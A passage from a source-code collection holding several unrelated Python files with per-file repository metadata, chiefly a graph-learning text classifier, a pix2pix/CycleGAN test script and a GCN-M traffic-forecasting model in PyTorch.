self.encoder = gcn_module(nfeat=hidden_size,
nhid=hidden_size,
nclass=hidden_size,
graph_hops=config.get('graph_hops', 2),
dropout=self.dropout,
batch_norm=config.get('batch_norm', False))
else:
raise RuntimeError('Unknown graph_module: {}'.format(self.graph_module))
if self.graph_learn:
graph_learn_fun = AnchorGraphLearner if self.scalable_run else GraphLearner
self.graph_learner = graph_learn_fun(word_embed_dim, config['graph_learn_hidden_size'],
topk=config['graph_learn_topk'],
epsilon=config['graph_learn_epsilon'],
num_pers=config['graph_learn_num_pers'],
metric_type=config['graph_metric_type'],
device=self.device)
self.graph_learner2 = graph_learn_fun(hidden_size,
config.get('graph_learn_hidden_size2', config['graph_learn_hidden_size']),
topk=config.get('graph_learn_topk2', config['graph_learn_topk']),
epsilon=config.get('graph_learn_epsilon2', config['graph_learn_epsilon']),
num_pers=config['graph_learn_num_pers'],
metric_type=config['graph_metric_type'],
device=self.device)
print('[ Graph Learner ]')
if config['graph_learn_regularization']:
print('[ Graph Regularization]')
else:
self.graph_learner = None
self.graph_learner2 = None
else:
print('[ Using RNN ]')
def compute_no_gnn_output(self, context, context_lens):
raw_context_vec = self.word_embed(context)
raw_context_vec = dropout(raw_context_vec, self.word_dropout, shared_axes=[-2], training=self.training)
# Shape: [batch_size, hidden_size]
context_vec = self.ctx_rnn_encoder(raw_context_vec, context_lens)[1][0].squeeze(0)
output = self.linear_out(context_vec).squeeze(-1)
return torch.sigmoid(output)
def learn_graph(self, graph_learner, node_features, graph_skip_conn=None, node_mask=None, anchor_mask=None, graph_include_self=False, init_adj=None, anchor_features=None):
if self.graph_learn:
if self.scalable_run:
node_anchor_adj = graph_learner(node_features, anchor_features, node_mask, anchor_mask)
return node_anchor_adj
else:
raw_adj = graph_learner(node_features, node_mask)
if self.graph_metric_type in ('kernel', 'weighted_cosine'):
assert raw_adj.min().item() >= 0
adj = raw_adj / torch.clamp(torch.sum(raw_adj, dim=-1, keepdim=True), min=VERY_SMALL_NUMBER)
elif self.graph_metric_type == 'cosine':
adj = (raw_adj > 0).float()
adj = normalize_adj(adj)
else:
adj = torch.softmax(raw_adj, dim=-1)
if graph_skip_conn in (0, None):
if graph_include_self:
adj = adj + to_cuda(torch.eye(adj.size(0)), self.device)
else:
adj = graph_skip_conn * init_adj + (1 - graph_skip_conn) * adj
return raw_adj, adj
else:
raw_adj = None
adj = init_adj
return raw_adj, adj
def compute_output(self, node_vec, node_mask=None):
graph_vec = self.graph_maxpool(node_vec.transpose(-1, -2), node_mask=node_mask)
output = self.linear_out(graph_vec).squeeze(-1)
return torch.sigmoid(output)
def prepare_init_graph(self, context, context_lens):
context_mask = create_mask(context_lens, context.size(-1), device=self.device)
# Shape: [batch_size, max_length, word_embed_dim]
raw_context_vec = self.word_embed(context)
raw_context_vec = dropout(raw_context_vec, self.word_dropout, shared_axes=[-2], training=self.training)
# Shape: [batch_size, max_length, hidden_size]
context_vec = self.ctx_rnn_encoder(raw_context_vec, context_lens)[0].transpose(0, 1)
init_adj = self.compute_init_adj(raw_context_vec.detach(), self.config['input_graph_knn_size'], mask=context_mask)
return raw_context_vec, context_vec, context_mask, init_adj
def graph_maxpool(self, node_vec, node_mask=None):
# Maxpool
# Shape: (batch_size, hidden_size, num_nodes)
graph_embedding = F.max_pool1d(node_vec, kernel_size=node_vec.size(-1)).squeeze(-1)
return graph_embedding
def compute_init_adj(self, features, knn_size, mask=None):
adj = get_binarized_kneighbors_graph(features, knn_size, mask=mask, device=self.device)
adj_norm = batch_normalize_adj(adj, mask=mask)
return adj_norm
class TextGraphClf(nn.Module):
def __init__(self, config, w_embedding, word_vocab):
super(TextGraphClf, self).__init__()
self.config = config
self.name = 'TextGraphClf'
self.device = config['device']
# Shape
word_embed_dim = config['word_embed_dim']
hidden_size = config['hidden_size']
nclass = 20
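# 20 output classes, hard-coded; presumably the 20 Newsgroups classification setup.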
# Dropout
self.dropout = config['dropout']
self.word_dropout = config.get('word_dropout', config['dropout'])
self.rnn_dropout = config.get('rnn_dropout', config['dropout'])
# Graph
self.graph_learn = config['graph_learn']
self.graph_metric_type = config['graph_metric_type']
self.graph_module = config['graph_module']
self.graph_skip_conn = config['graph_skip_conn']
self.graph_include_self = config.get('graph_include_self', True)
# Text
self.word_embed = w_embedding
if config['fix_vocab_embed']:
print('[ Fix word embeddings ]')
for param in self.word_embed.parameters():
param.requires_grad = False
self.ctx_rnn_encoder = EncoderRNN(word_embed_dim, hidden_size, bidirectional=True, num_layers=1, rnn_type='lstm',
rnn_dropout=self.rnn_dropout, device=self.device)
self.linear_out = nn.Linear(hidden_size, nclass, bias=False)
self.scalable_run = config.get('scalable_run', False)
if not config.get('no_gnn', False):
print('[ Using TextGNN ]')
# self.linear_max = nn.Linear(hidden_size, nclass, bias=False)
if self.graph_module == 'gcn':
gcn_module = AnchorGCN if self.scalable_run else GCN
self.encoder = gcn_module(nfeat=hidden_size,
nhid=hidden_size,
nclass=hidden_size,
graph_hops=config.get('graph_hops', 2),
dropout=self.dropout,
batch_norm=config.get('batch_norm', False))
else:
raise RuntimeError('Unknown graph_module: {}'.format(self.graph_module))
if self.graph_learn:
graph_learn_fun = AnchorGraphLearner if self.scalable_run else GraphLearner
self.graph_learner = graph_learn_fun(word_embed_dim, config['graph_learn_hidden_size'],
topk=config['graph_learn_topk'],
epsilon=config['graph_learn_epsilon'],
num_pers=config['graph_learn_num_pers'],
metric_type=config['graph_metric_type'],
device=self.device)
self.graph_learner2 = graph_learn_fun(hidden_size,
config.get('graph_learn_hidden_size2', config['graph_learn_hidden_size']),
topk=config.get('graph_learn_topk2', config['graph_learn_topk']),
epsilon=config.get('graph_learn_epsilon2', config['graph_learn_epsilon']),
num_pers=config['graph_learn_num_pers'],
metric_type=config['graph_metric_type'],
device=self.device)
print('[ Graph Learner ]')
if config['graph_learn_regularization']:
print('[ Graph Regularization]')
else:
self.graph_learner = None
self.graph_learner2 = None
else:
print('[ Using RNN ]')
def compute_no_gnn_output(self, context, context_lens):
raw_context_vec = self.word_embed(context)
raw_context_vec = dropout(raw_context_vec, self.word_dropout, shared_axes=[-2], training=self.training)
# Shape: [batch_size, hidden_size]
context_vec = self.ctx_rnn_encoder(raw_context_vec, context_lens)[1][0].squeeze(0)
output = self.linear_out(context_vec)
output = F.log_softmax(output, dim=-1)
return output
def learn_graph(self, graph_learner, node_features, graph_skip_conn=None, node_mask=None, anchor_mask=None, graph_include_self=False, init_adj=None, anchor_features=None):
if self.graph_learn:
if self.scalable_run:
node_anchor_adj = graph_learner(node_features, anchor_features, node_mask, anchor_mask)
return node_anchor_adj
else:
raw_adj = graph_learner(node_features, node_mask)
if self.graph_metric_type in ('kernel', 'weighted_cosine'):
assert raw_adj.min().item() >= 0
adj = raw_adj / torch.clamp(torch.sum(raw_adj, dim=-1, keepdim=True), min=VERY_SMALL_NUMBER)
elif self.graph_metric_type == 'cosine':
adj = (raw_adj > 0).float()
adj = normalize_adj(adj)
else:
adj = torch.softmax(raw_adj, dim=-1)
if graph_skip_conn in (0, None):
if graph_include_self:
adj = adj + to_cuda(torch.eye(adj.size(0)), self.device)
else:
adj = graph_skip_conn * init_adj + (1 - graph_skip_conn) * adj
return raw_adj, adj
else:
raw_adj = None
adj = init_adj
return raw_adj, adj
def compute_output(self, node_vec, node_mask=None):
graph_vec = self.graph_maxpool(node_vec.transpose(-1, -2), node_mask=node_mask)
output = self.linear_out(graph_vec)
output = F.log_softmax(output, dim=-1)
return output
def prepare_init_graph(self, context, context_lens):
context_mask = create_mask(context_lens, context.size(-1), device=self.device)
# Shape: [batch_size, max_length, word_embed_dim]
raw_context_vec = self.word_embed(context)
raw_context_vec = dropout(raw_context_vec, self.word_dropout, shared_axes=[-2], training=self.training)
# Shape: [batch_size, max_length, hidden_size]
context_vec = self.ctx_rnn_encoder(raw_context_vec, context_lens)[0].transpose(0, 1)
init_adj = self.compute_init_adj(raw_context_vec.detach(), self.config['input_graph_knn_size'], mask=context_mask)
return raw_context_vec, context_vec, context_mask, init_adj
def graph_maxpool(self, node_vec, node_mask=None):
# Maxpool
# Shape: (batch_size, hidden_size, num_nodes)
graph_embedding = F.max_pool1d(node_vec, kernel_size=node_vec.size(-1)).squeeze(-1)
return graph_embedding
def compute_init_adj(self, features, knn_size, mask=None):
adj = get_binarized_kneighbors_graph(features, knn_size, mask=mask, device=self.device)
adj_norm = batch_normalize_adj(adj, mask=mask)
return adj_norm
hexsha: 59c8b2e7c73027dfe9e42947b83877f9503d970a | path: workplace_extractor/__init__.py | repo: denisduarte/workplace_extractor @ 722fcaa535aea38c22985c887d0647ba664d7a5f | license: MIT | lang: Python | size: 97 bytes | forks: 1
from workplace_extractor.Extractor import Extractor
from workplace_extractor.Extractor import run
hexsha: ab7445cc2320dbd1e07c469275c9c3521946198b | path: release_manager/__init__.py | repo: snowplow/release-manager @ 72a82cf9705d4e299e97e4aecd25f4c19bfcba59 | license: Apache-2.0 | lang: Python | size: 233 bytes | stars: 9 | issues: 37 | forks: 2
"""release_manager: __init__.py declaration"""
import release_manager.targets
import release_manager.__main__
import release_manager._version
import release_manager.logger
import release_manager.package
import release_manager.utils
hexsha: abf6148c6713211940fd6fbd85b41121176136d1 | path: example/test/core/geometry/simple/hyperboloid/unit.py | repo: dmilos/IceRay @ 4e01f141363c0d126d3c700c1f5f892967e3d520 | license: MIT-0 | lang: Python | size: 740 bytes | stars: 2 | forks: 1
import math
import IceRayCpp
def name( ):
return "hyperboloid"
def cone( P_core = 0 ):
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
def cylinder( P_core = 1 ):
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
def sphere( P_core = math.sqrt(2) ):
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
def negative( P_core = -0.5 ): # double side
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
def nuke( P_core = 0.5 ): # single side.
geometry = IceRayCpp.GeometrySimpleHyperboloid( P_core )
return{ 'this' : geometry }
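Each factory above returns the constructed geometry wrapped in a dict under the 'this' key. A hypothetical consumer (the module alias and the loop are assumptions; IceRayCpp must be importable for this to run):

import unit  # this module

print(unit.name())  # -> "hyperboloid"
for factory in (unit.cone, unit.cylinder, unit.sphere, unit.negative, unit.nuke):
    geometry = factory()['this']  # unwrap the IceRayCpp geometry object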
| 27.407407
| 61
| 0.660811
| 81
| 740
| 5.91358
| 0.308642
| 0.104384
| 0.438413
| 0.448852
| 0.720251
| 0.720251
| 0.720251
| 0.720251
| 0.720251
| 0
| 0
| 0.012324
| 0.232432
| 740
| 26
| 62
| 28.461538
| 0.830986
| 0.032432
| 0
| 0.526316
| 0
| 0
| 0.04519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.315789
| false
| 0
| 0.105263
| 0.052632
| 0.473684
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 2802de2cdcfde6212d0c2f4bd544744f4ab744c3
| 1,407
| py
| Python
| produce_image_for_inception_score.py
| raph-m/pytorch-CycleGAN-and-pix2pix
| 41891a12fb4f92ebef60e82fe533110c2d5a6311
| ["BSD-3-Clause"]
| null
| null
| null
| produce_image_for_inception_score.py
| raph-m/pytorch-CycleGAN-and-pix2pix
| 41891a12fb4f92ebef60e82fe533110c2d5a6311
| ["BSD-3-Clause"]
| null
| null
| null
| produce_image_for_inception_score.py
| raph-m/pytorch-CycleGAN-and-pix2pix
| 41891a12fb4f92ebef60e82fe533110c2d5a6311
| ["BSD-3-Clause"]
| null
| null
| null
|
import sys
from utils import celeba_pix2pix_params, celeba_cycle_params
from utils import set_argv
from options.test_options import TestOptions
from test import test
if __name__ == "__main__":
first_arg = sys.argv[0]
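    # NOTE: the bare triple-quoted string below is used to disable the two
    # pix2pix runs; only the cycle-GAN block at the bottom actually executes.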
"""
current_params = celeba_pix2pix_params.copy()
current_params["epoch"] = "5"
current_params["num_test"] = "10000"
current_params["dataroot"] = "my_data/celeba"
current_params["results_dir"] = "inception_results_epoch5"
current_params["dataset_mode"] = "unaligned"
sys.argv = set_argv(current_params, first_arg)
opt = TestOptions().parse()
test(opt)
current_params = celeba_pix2pix_params.copy()
current_params["epoch"] = "10"
current_params["num_test"] = "10000"
current_params["dataroot"] = "my_data/celeba"
current_params["results_dir"] = "inception_results"
current_params["dataset_mode"] = "unaligned"
sys.argv = set_argv(current_params, first_arg)
opt = TestOptions().parse()
test(opt)
"""
current_params = celeba_cycle_params.copy()
current_params["epoch"] = "5" # TODO: check this
current_params["num_test"] = "10000"
current_params["dataroot"] = "my_data/celeba"
current_params["results_dir"] = "inception_results_epoch5"
current_params["dataset_mode"] = "unaligned"
sys.argv = set_argv(current_params, first_arg)
opt = TestOptions().parse()
test(opt)
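Since the three parameter blocks differ only in "epoch" and "results_dir", the sweep can be expressed as a loop; a sketch using only names already defined in the script (not part of the original file):

    for epoch, results_dir in [("5", "inception_results_epoch5"),
                               ("10", "inception_results")]:
        current_params = celeba_cycle_params.copy()
        current_params["epoch"] = epoch
        current_params["num_test"] = "10000"
        current_params["dataroot"] = "my_data/celeba"
        current_params["results_dir"] = results_dir
        current_params["dataset_mode"] = "unaligned"
        sys.argv = set_argv(current_params, first_arg)
        opt = TestOptions().parse()
        test(opt)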
| 32.72093
| 62
| 0.705046
| 174
| 1,407
| 5.327586
| 0.235632
| 0.294498
| 0.061489
| 0.074434
| 0.800432
| 0.800432
| 0.768069
| 0.768069
| 0.768069
| 0.67206
| 0
| 0.021368
| 0.168444
| 1,407
| 42
| 63
| 33.5
| 0.77094
| 0.011372
| 0
| 0
| 0
| 0
| 0.171289
| 0.039152
| 0
| 0
| 0
| 0.02381
| 0
| 1
| 0
| false
| 0
| 0.3125
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 9
| 2803829e9e7142422f9e9cf1901b1824cd147a21
| 18,625
| py
| Python
| models/model.py
| GCN-M/GCN-M
| 2f099706fa6a4c88ca804729865acf2334116005
| ["Apache-2.0"]
| null
| null
| null
| models/model.py
| GCN-M/GCN-M
| 2f099706fa6a4c88ca804729865acf2334116005
| ["Apache-2.0"]
| null
| null
| null
| models/model.py
| GCN-M/GCN-M
| 2f099706fa6a4c88ca804729865acf2334116005
| ["Apache-2.0"]
| null
| null
| null
|
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
from utils.masking import TriangularCausalMask, ProbMask
import data.dcrnn_utils as dcrnn_utils
from models.encoder import Encoder, EncoderLayer, ConvLayer, EncoderStack
from models.decoder import Decoder, DecoderLayer
from models.attn import FullAttention, ProbAttention, AttentionLayer
from models.embed import DataEmbedding
from models.gnn import gcn, gcn_gwnet, gcn_gcnm_dynamic, spatialGCN
from models.memoryModule import LocalFeatureModule, MemoryModule
class GCNM(nn.Module):
def __init__(self, device, num_nodes, dropout=0.3, supports=None, gcn_bool=True, addaptadj=True, aptinit=None, in_dim=2, out_dim=12,residual_channels=32,dilation_channels=32,skip_channels=256,end_channels=512,kernel_size=2,blocks=4,layers=2):
"""
full_data: full dataset including dateTime
in_dim: the input data dimension (i.e., node numbers)
"""
super(GCNM, self).__init__()
self.local_feature_model = LocalFeatureModule(num_nodes)
self.memory_model = MemoryModule(in_dim, residual_channels)
self.dropout = dropout
self.blocks = blocks
self.layers = layers
self.gcn_bool = gcn_bool
self.addaptadj = addaptadj
self.filter_convs = nn.ModuleList()
self.gate_convs = nn.ModuleList()
self.residual_convs = nn.ModuleList()
self.skip_convs = nn.ModuleList()
self.bn = nn.ModuleList()
self.gconv = nn.ModuleList()
        # TODO: check whether "start_conv" is still needed
self.start_conv = nn.Conv2d(in_channels=in_dim,
out_channels=residual_channels,
kernel_size=(1, 1))
self.supports = supports
receptive_field = 1
self.supports_len = 0
if supports is not None:
self.supports_len += len(supports)
if gcn_bool and addaptadj:
if aptinit is None:
if supports is None:
self.supports = []
self.nodevec1 = nn.Parameter(torch.randn(num_nodes, 10).to(device), requires_grad=True).to(device)
self.nodevec2 = nn.Parameter(torch.randn(10, num_nodes).to(device), requires_grad=True).to(device)
self.supports_len += 1
else:
if supports is None:
self.supports = []
m, p, n = torch.svd(aptinit)
initemb1 = torch.mm(m[:, :10], torch.diag(p[:10] ** 0.5))
initemb2 = torch.mm(torch.diag(p[:10] ** 0.5), n[:, :10].t())
self.nodevec1 = nn.Parameter(initemb1, requires_grad=True).to(device)
self.nodevec2 = nn.Parameter(initemb2, requires_grad=True).to(device)
self.supports_len += 1
for b in range(blocks):
additional_scope = kernel_size - 1
new_dilation = 1
for i in range(layers):
# dilated convolutions
self.filter_convs.append(nn.Conv2d(in_channels=residual_channels,
out_channels=dilation_channels,
kernel_size=(1,kernel_size),dilation=new_dilation))
self.gate_convs.append(nn.Conv1d(in_channels=residual_channels,
out_channels=dilation_channels,
kernel_size=(1, kernel_size), dilation=new_dilation))
# 1x1 convolution for residual connection
self.residual_convs.append(nn.Conv1d(in_channels=dilation_channels,
out_channels=residual_channels,
kernel_size=(1, 1)))
# 1x1 convolution for skip connection
self.skip_convs.append(nn.Conv1d(in_channels=dilation_channels,
out_channels=skip_channels,
kernel_size=(1, 1)))
self.bn.append(nn.BatchNorm2d(residual_channels))
new_dilation *=2
receptive_field += additional_scope
additional_scope *= 2
if self.gcn_bool:
self.gconv.append(gcn_gwnet(dilation_channels,residual_channels,dropout,support_len=self.supports_len))
self.end_conv_1 = nn.Conv2d(in_channels=skip_channels,
out_channels=end_channels,
kernel_size=(1,1),
bias=True)
self.end_conv_2 = nn.Conv2d(in_channels=end_channels,
out_channels=out_dim,
kernel_size=(1,1),
bias=True)
self.receptive_field = receptive_field
def forward(self, input, x_hist):
"""
:param input: (B, 8, L, D)
:param x_hist: (B, n*tau, L, D)
:return: e: enrichied traffic embedding (B, L, D)
"""
z = self.local_feature_model(input) #(B, L, D)
z = torch.unsqueeze(z, dim=-1) # (B, L, D) -> (B, L, D, 1)
x_hist = torch.unsqueeze(x_hist, dim=-1)#(B, n*tau, L, D, 1)
x_hist = x_hist.transpose(1, 2).contiguous() #(B, L, n*tau, D, F)
#(B, L, D, F), (B, L, n*tau, D, F)
e = self.memory_model(z, x_hist) # (B, L, D, F), (B, L, n*tau, D, F) -> (B, F', L, D)
input = e.permute(0, 1, 3, 2).contiguous() #(B, F', D, L)
"""
# the input is from the enriched temporal embedding
# input: temporal embedding (N, 1, D, L)
"""
in_len = input.size(3) # (N, F, D, L), here F=1
        if in_len < self.receptive_field: # receptive_field = 12 + 1
x = nn.functional.pad(input, (self.receptive_field - in_len, 0, 0, 0)) # (N, F, D, L+1)
else:
x = input
#x = self.start_conv(x) # kernel=(1,1), (N, 1, D, L+1) -> (N, 1, D, L+1)
skip = 0
# calculate the current adaptive adj matrix once per iteration
new_supports = None
if self.gcn_bool and self.addaptadj and self.supports is not None:
adp = F.softmax(F.relu(torch.mm(self.nodevec1, self.nodevec2)), dim=1)
new_supports = self.supports + [adp]
# WaveNet layers
for i in range(self.blocks * self.layers):
residual = x
# dilated convolution
filter = self.filter_convs[i](residual) # kernel=(1, 2)
filter = torch.tanh(filter)
gate = self.gate_convs[i](residual) # kernel=(1,2)
gate = torch.sigmoid(gate)
# x=filter=gate: (B, residual_size, D, F)
x = filter * gate
# parametrized skip connection
s = x
s = self.skip_convs[i](s)
            try:
                skip = skip[:, :, :, -s.size(3):]
            except TypeError:  # skip is still the integer 0 on the first pass
                skip = 0
skip = s + skip
if self.gcn_bool and self.supports is not None:
if self.addaptadj:
# x: (B, residual_size, D, F)
#print("input.shape 1 is {}".format(x.size()))
x = self.gconv[i](x, new_supports)
#print("input.shape 2 is {}".format(x.size()))
else:
x = self.gconv[i](x, self.supports)
else:
x = self.residual_convs[i](x)
x = x + residual[:, :, :, -x.size(3):]
x = self.bn[i](x)
x = F.relu(skip)
x = F.relu(self.end_conv_1(x))
x = self.end_conv_2(x) # [N, L, D, 1]
x = torch.squeeze(x, dim=-1) # [N, L, D]
return x.contiguous()
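The adaptive adjacency used by GCNM above is a softmax-normalized product of two learned node embeddings. A standalone sketch of just that step (the node count is an illustrative assumption):

# adp = softmax(relu(E1 @ E2), dim=1): a dense, row-stochastic (D, D) graph
num_nodes = 207
nodevec1 = torch.randn(num_nodes, 10)
nodevec2 = torch.randn(10, num_nodes)
adp = F.softmax(F.relu(torch.mm(nodevec1, nodevec2)), dim=1)
assert torch.allclose(adp.sum(dim=1), torch.ones(num_nodes))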
class GCNMdynamic(nn.Module):
def __init__(self, device, num_nodes, dropout=0.3, supports=None, gcn_bool=True, addaptadj=True, aptinit=None, in_dim=2, out_dim=12,residual_channels=32,dilation_channels=32,skip_channels=256,end_channels=512,kernel_size=2,blocks=4,layers=2):
"""
full_data: full dataset including dateTime
in_dim: the input data dimension (i.e., node numbers)
"""
super(GCNMdynamic, self).__init__()
self.local_feature_model = LocalFeatureModule(num_nodes)
self.memory_model = MemoryModule(in_dim, residual_channels)
self.num_nodes = num_nodes
self.device = device
self.dropout = dropout
self.blocks = blocks
self.layers = layers
self.gcn_bool = gcn_bool
self.addaptadj = addaptadj
self.filter_convs = nn.ModuleList()
self.gate_convs = nn.ModuleList()
self.residual_convs = nn.ModuleList()
self.skip_convs = nn.ModuleList()
self.bn = nn.ModuleList()
self.gconv = nn.ModuleList()
        # TODO: check whether "start_conv" is still needed
self.start_conv = nn.Conv2d(in_channels=in_dim,
out_channels=residual_channels,
kernel_size=(1, 1))
self.supports = supports
receptive_field = 1
self.supports_len = 2
#parameters for initializing the static node embeddings
node_dim = residual_channels
self.alpha = 3
self.emb1 = nn.Embedding(self.num_nodes, node_dim)
self.emb2 = nn.Embedding(self.num_nodes, node_dim)
self.lin1 = nn.Linear(node_dim, node_dim)
self.lin2 = nn.Linear(node_dim, node_dim)
self.idx = torch.arange(self.num_nodes).to(self.device)
self.GCN1_1 = gcn_gwnet(c_in=residual_channels,c_out=residual_channels,
dropout=self.dropout,support_len=1)
self.GCN1_2 = gcn_gwnet(c_in=residual_channels,c_out=residual_channels,
dropout=self.dropout,support_len=1)
self.GCN2_1 = gcn_gwnet(c_in=residual_channels,c_out=residual_channels,
dropout=self.dropout,support_len=1)
self.GCN2_2 = gcn_gwnet(c_in=residual_channels,c_out=residual_channels,
dropout=self.dropout,support_len=1)
for b in range(blocks):
additional_scope = kernel_size - 1
new_dilation = 1
for i in range(layers):
# dilated convolutions
self.filter_convs.append(nn.Conv2d(in_channels=residual_channels,
out_channels=dilation_channels,
kernel_size=(1,kernel_size),dilation=new_dilation))
self.gate_convs.append(nn.Conv1d(in_channels=residual_channels,
out_channels=dilation_channels,
kernel_size=(1, kernel_size), dilation=new_dilation))
# 1x1 convolution for residual connection
self.residual_convs.append(nn.Conv1d(in_channels=dilation_channels,
out_channels=residual_channels,
kernel_size=(1, 1)))
# 1x1 convolution for skip connection
self.skip_convs.append(nn.Conv1d(in_channels=dilation_channels,
out_channels=skip_channels,
kernel_size=(1, 1)))
self.bn.append(nn.BatchNorm2d(residual_channels))
new_dilation *=2
receptive_field += additional_scope
additional_scope *= 2
if self.gcn_bool:
self.gconv.append(gcn_gcnm_dynamic(dilation_channels,residual_channels,dropout,support_len=self.supports_len))
self.end_conv_1 = nn.Conv2d(in_channels=skip_channels,
out_channels=end_channels,
kernel_size=(1,1),
bias=True)
self.end_conv_2 = nn.Conv2d(in_channels=end_channels,
out_channels=out_dim,
kernel_size=(1,1),
bias=True)
self.receptive_field = receptive_field
if out_dim > self.receptive_field:
self.skip0 = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, out_dim), bias=True)
self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, out_dim-self.receptive_field+1), bias=True)
else:
self.skip0 = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, self.receptive_field), bias=True)
self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, 1), bias=True)
def preprocessing(self, adj):
#adj: (B, L, D, D)
adj = adj + torch.eye(self.num_nodes).to(self.device)
adj = adj / torch.unsqueeze(adj.sum(-1), -1)
return adj
def forward(self, input, x_hist):
"""
:param input: (B, 8, L, D)
:param x_hist: (B, n*tau, L, D)
:return: e: enrichied traffic embedding (B, L, D)
"""
z = self.local_feature_model(input) #(B, L, D)
z = torch.unsqueeze(z, dim=-1) # (B, L, D) -> (B, L, D, 1)
x_hist = torch.unsqueeze(x_hist, dim=-1)#(B, n*tau, L, D, 1)
x_hist = x_hist.transpose(1, 2).contiguous() #(B, L, n*tau, D, F)
#(B, L, D, F), (B, L, n*tau, D, F)
e = self.memory_model(z, x_hist) # (B, L, D, F), (B, L, n*tau, D, F) -> (B, residual_channels, L, D)
input = e.permute(0, 1, 3, 2).contiguous() #(B, F', D, L)
"""
# the input is from the enriched temporal embedding
# input: temporal embedding (N, 1, D, L)
"""
in_len = input.size(3) # (N, F, D, L), here F=1
        if in_len < self.receptive_field: # receptive_field = 12 + 1
x = nn.functional.pad(input, (self.receptive_field - in_len, 0, 0, 0)) # (N, residual_channels, D, L+1)
else:
x = input
#x = self.start_conv(x) # kernel=(1,1), (N, 1, D, L+1) -> (N, 1, D, L+1)
#skip = 0
skip = self.skip0(x)
# calculate the current adaptive adj matrix once per iteration
'''new_supports = None
if self.gcn_bool and self.addaptadj and self.supports is not None:
adp = F.softmax(F.relu(torch.mm(self.nodevec1, self.nodevec2)), dim=1)
new_supports = self.supports + [adp]
'''
# x: (N, residual_channels, D, L), support[i]: (D, D)
nodevecInit_1 = self.emb1(self.idx) # (D, node_dim=residual_channels)
nodevecInit_2 = self.emb2(self.idx) # (D, node_dim=residual_channels)
# WaveNet layers
for i in range(self.blocks * self.layers):
residual = x
# dilated convolution
filter = self.filter_convs[i](residual) # kernel=(1, 2)
filter = torch.tanh(filter)
gate = self.gate_convs[i](residual) # kernel=(1,2)
gate = torch.sigmoid(gate)
# x=filter=gate: (B, residual_size, D, F)
x = filter * gate
# ***************** construct dynamic graphs from e ***************** #
# print("x.size: {}, support0: {}, support1: {}".format(x.size(), self.supports[0].size(), self.supports[1].size()))
'''filter1 = self.GCN1_1(x, [self.supports[0]]) + self.GCN1_2(x, [
self.supports[1]]) # (N, residual_channels, D, L)
filter2 = self.GCN2_1(x, [self.supports[0]]) + self.GCN2_2(x, [
self.supports[1]]) # (N, residual_channels, D, L)'''
filter1 = self.GCN1_1(x, [self.supports[0]]) # (N, residual_channels, D, L)
filter2 = self.GCN2_1(x, [self.supports[1]]) # (N, residual_channels, D, L)
filter1 = filter1.permute((0, 3, 2, 1)).contiguous() # (N, L, D, residual_channels)
filter2 = filter2.permute((0, 3, 2, 1)).contiguous() # (N, L, D, residual_channels)
nodevec1 = torch.tanh(self.alpha * torch.mul(nodevecInit_1, filter1)) # (N, L, D, residual_channels)
nodevec2 = torch.tanh(self.alpha * torch.mul(nodevecInit_2, filter2))
# objective: construct "support/A" with size (B, D, D, L)
a = torch.matmul(nodevec1, nodevec2.transpose(2, 3)) - torch.matmul(
nodevec2, nodevec1.transpose(2, 3)) # (B, L, D, D)
adj = F.relu(torch.tanh(self.alpha * a))
            mask = torch.zeros_like(adj)  # zeros with adj's shape, dtype and device
s1, t1 = adj.topk(20, -1)
mask.scatter_(-1, t1, s1.fill_(1))
adj = adj * mask
adp = self.preprocessing(adj)
adpT = self.preprocessing(adj.transpose(2, 3))
adp = adp.permute((0, 2, 3, 1)).contiguous() # (B, D, D, L)
adpT = adpT.permute((0, 2, 3, 1)).contiguous()
#new_supports = [adp, adpT, self.supports[0], self.supports[1]] # dynamic and pre-defined graph
new_supports = [adp, adpT]
# parametrized skip connection
#x = F.dropout(x, self.dropout)
s = x
s = self.skip_convs[i](s)
            try:
                skip = skip[:, :, :, -s.size(3):]
            except TypeError:  # skip is still the integer 0 on the first pass
                skip = 0
skip = s + skip
if self.gcn_bool and self.supports is not None:
if self.addaptadj:
# x: (B, residual_size, D, F)
#print("input.shape 1 is {}".format(x.size()))
x = self.gconv[i](x, new_supports)
#print("input.shape 2 is {}".format(x.size()))
else:
x = self.gconv[i](x, self.supports)
else:
x = self.residual_convs[i](x)
x = x + residual[:, :, :, -x.size(3):]
x = self.bn[i](x)
skip = self.skipE(x) + skip
x = F.relu(skip)
x = F.relu(self.end_conv_1(x)) # [N, skip_channels, D, 1] -> [N, end_channels, D, 1]
x = self.end_conv_2(x) # [N, end_channels, D, 1] -> [N, L, D, 1]
x = torch.squeeze(x, dim=-1) # [N, L, D]
return x.contiguous()
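GCNMdynamic builds a new graph per layer: node embeddings are modulated by GCN outputs, an asymmetric score matrix is sparsified to its top-20 entries per row, and preprocessing() adds self-loops and row-normalizes. A standalone sketch of the sparsification and normalization steps (the tensor sizes are illustrative assumptions):

B, L, D = 2, 12, 30                      # D must exceed the top-k of 20
a = torch.randn(B, L, D, D)
adj = F.relu(torch.tanh(3 * a))          # alpha = 3, as in the module
mask = torch.zeros_like(adj)
s1, t1 = adj.topk(20, -1)                # keep the 20 largest scores per row
mask.scatter_(-1, t1, s1.fill_(1))       # mark kept positions with 1
adj = adj * mask
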